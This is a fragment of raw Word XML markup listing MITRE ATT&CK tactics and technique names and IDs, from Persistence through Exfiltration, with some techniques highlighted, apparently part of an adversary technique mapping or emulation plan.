        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1EFBEB"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1098', 'T1136', 'T1136.002', 'T1505.001', 'T1505.003', 'T1078.002', 'T1133', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB33292"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1098 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Account Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA800D4"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1136 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Create Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37348D2C"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T1136.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create Account&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7618A7C0"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T1505.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:SQL Stored Procedures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE857A1"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T1505.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Server Software Component&gt;:Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E767E1A"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D07148"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619695B8"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FAA762"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1078.002', 'T1078']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F437E2"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E10DEC7"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083F2D92"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lastRenderedPageBreak/>
        <w:t>Next tactic is TA</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Evasion ['T1027.002', 'T1562.002', 'T1078.002', 'T1218.011', 'T1078', 'T1036.005', 'T1140', 'T1070.004', 'T1027']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC3F322"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T1027.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obfuscated Files or Information&gt;:Software Packing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5348ED"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T1562.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Impair </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Defenses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;:Disable Windows Event Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78218363"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BA5E42"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T1218.011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Binary Proxy Execution&gt;:Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BED607"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425B266"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T1036.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Masquerading&gt;:Match Legitimate Name or Location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05399D18"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1140 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deobfuscate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Decode Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4C5160"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T1070.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Indicator Removal on Host&gt;:File Deletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA976F"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1027 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Obfuscated Files or Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF042B4"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0006 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential Access ['T1110.003', 'T1555.003', 'T1003.001', 'T1056.001', 'T1040']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283BFB3D"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T1110.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Brute Force&gt;:Password Spraying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202212C7"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T1555.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Credentials from Password Stores&gt;:Credentials from Web Browsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563717EF"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T1003.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;OS Credential Dumping&gt;:LSASS Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E1C25" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00736B2D" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00736B2D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAA75A2"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1040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F988D"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0007 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Discovery ['T1033', 'T1083', 'T1049', 'T1018', 'T1016', 'T1087.003', 'T1082', 'T1040', 'T1087.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503C24C0"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1033 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Owner/User Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5AB730"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1083 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> File and Directory Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69327351"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1049 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Connections Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EE42F"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1018 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote System Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5204BF48"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1016 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Network Configuration Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2B0FB1"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T1087.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Email Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05A74E"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1082 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> System Information Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F04969"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1040 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323CEE1A"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T1087.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Account Discovery&gt;:Domain Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668734AF"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0008 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Movement ['T1021.002', 'T1570']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD0439"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T1021.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Remote Services&gt;:SMB/Windows Admin Shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6497F910"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1570 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Lateral Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353ACC7B"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0009 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Collection ['T1005', 'T1056.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC35337"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1005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Data from Local System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5C3839"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T1056.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Input Capture&gt;:Keylogging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE5DB58"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0011 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Command and Control ['T1571', 'T1219', 'T1102.002', 'T1105', 'T1071.001', 'T1090', 'T1132.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C8388"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1571 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Non-Standard Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EEB399"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1219 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Remote Access Software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406CE174"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T1102.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C120472" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00A5536D" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A5536D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A5536D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>1105 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A5536D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A415311" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00947702" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Next Technique is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00947702">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1071.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00947702">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471CA238"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1090 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Proxy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30881F87"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T1132.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Data Encoding&gt;:Standard Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712E4812"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0010 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B76AEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration ['T1041']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FC610" w14:textId="77777777" w:rsidR="00B76AEB" w:rsidRPr="00736B2D" w:rsidRDefault="00B76AEB" w:rsidP="00B76AEB">
